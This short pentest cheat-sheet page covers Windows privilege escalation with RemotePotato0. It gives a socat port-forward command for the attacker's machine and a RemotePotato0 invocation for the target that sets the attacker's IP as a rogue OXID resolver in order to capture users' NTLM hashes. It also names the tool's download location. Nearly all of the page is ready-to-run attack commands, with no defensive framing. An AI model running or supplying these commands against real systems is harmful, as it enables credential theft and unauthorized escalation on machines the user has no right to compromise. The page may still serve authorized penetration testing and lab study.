Page cover

Windows PrivEsc with RemotePotato

In local machine, start port forwarding.

sudo socat tcp-listen:135,fork,reuseaddr tcp:<remote-ip>:9999
Copied!

In target Windows machine, run RemotePotato. We can download the executable from https://github.com/antonioCoco/RemotePotato0.

# -m: Module (2: Rpc capture server + potato trigger)
# -x: Rogue Oxid resolver ip
# -s: Session id for the Cross Session Activation attack
.\RemotePotato0.exe -m 2 -x <local-ip> -p 9999 -s 1
Copied!

After that, we might be able to user password (NTLM hash).

References

Last updated